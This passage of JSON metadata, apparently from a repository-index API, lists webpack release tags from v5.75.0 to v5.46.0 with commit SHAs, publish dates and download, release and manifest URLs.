ies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url"